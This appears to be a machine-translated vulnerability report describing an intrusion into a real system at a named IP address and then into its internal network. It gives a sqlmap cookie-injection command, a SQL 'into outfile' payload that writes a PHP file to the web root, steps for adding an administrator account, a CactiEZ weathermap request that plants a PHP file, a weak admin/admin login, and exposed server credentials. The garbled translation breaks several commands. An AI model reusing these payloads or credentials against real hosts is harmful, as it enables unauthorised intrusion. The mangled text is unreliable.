Getshell of a certain system (a successful Intranet roaming \ successful getshell of a System)
First, a cookie SQL Injection
C: \ Python27 \ sqlmap> sqlmap. py-u "http: // 218.5.173.228: 90/Client/CmxAbout. php "-- cookie" RAS_UserInfo_UserName = wooyun "-- level 3-p RAS_UserInfo_UserName -- dbms = mysql
Getshell
http://*******/bugs/wooyun-2010-0130866
Previous articles. Add 'to the cookie to obtain the absolute path.
C:\Program Files (x86)\Comexe\RasMini\rasweb\Apache2\htdocs\Smarty-2.6.19\Client\
Absolute path
Getshell
RAS_UserInfo_UserName = wooyun 'and 1 = 2 union select 0x776F6F79756E3C3F70687020706870696E666F28293B3F3E into outfile 'C:/Program Files (x86) /Comexe/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Client/wooyun. php '% 23 can see that the code of the predecessors is
0x776F6F79756E3C3F70687020706870696E666F28293B3F3E
This code is written to Client/wooyun. php.
The hex encryption is used to remove 0x and decrypt it. We can see that it is wooyun.
Written successfully
In
wooyun
Encrypt with hex
Get
Continue directly ~~ Password wooyun 218.5.173.228: 90/Client/wooyun2.php is successfully written.
Cmd view Permissions
Sy permission, directly add the Administrator to find the port, port 91.
Successfully entered
Enable a scanner to scan the Intranet
Detected
http://10.0.10.38
Cms of century internet CactiEZ. Getshell
/Plugins/weathermap/editor. php? Plug = 0 & mapname = sea. php & action = set_map_properties merge m = export m2 = & debug = existing & node_name = & node_x = & node_y = & node_new_name = & node_label = & node_infourl = & node_hover = & node_iconfilename = -- NONE -- & link_name = & region = & link_bandwidth_out = & link_target = & link_width = & link_infourl = & link_hover = & map_title = & map_legend = Traffic + Load & map_stamp = Created: + % B + % d + % Y + % H: % M: % S & Records = 7 & map_linkdefaultbwin = 100 M & Records = 100 M & map_width = 800 & map_height = 600 & map_pngfile = & map_htmlfile = & map_bgfile = -- NONE -- & mapstyle_linklabels = percent & mapstyle_htmlstyle = overlib & mapstyle_a rrowstyle = classic & mapstyle_nodefont = 3 & mapstyle_linkfont = 2 & mapstyle_legendfont = 4 & item_configtext = Name for direct access,
http://10.0.10.38/plugins/weathermap/configs/sea.php
Password 0
I don't know why, but the server cannot connect to a single sentence. This is confusing.
http://10.0.88.91/
I found this again.
Weak Password admin/admin
Successfully entered.
There is another strange phenomenon.
I found that many internal systems are connected to my last SQL injection.
http://*****/bugs/wooyun-2016-0193268
Http: // 10.0.6.19/eassso/login? Service = http % 3A % 2F % 2F10. 0.6.19% 3A6890% 2 Feasportal % 2 FssoWelcome % 3 FredirectTo % 3D % 2Findex_sso.jsp any announcement will jump to release. Not going deep into the server account sea $ password sea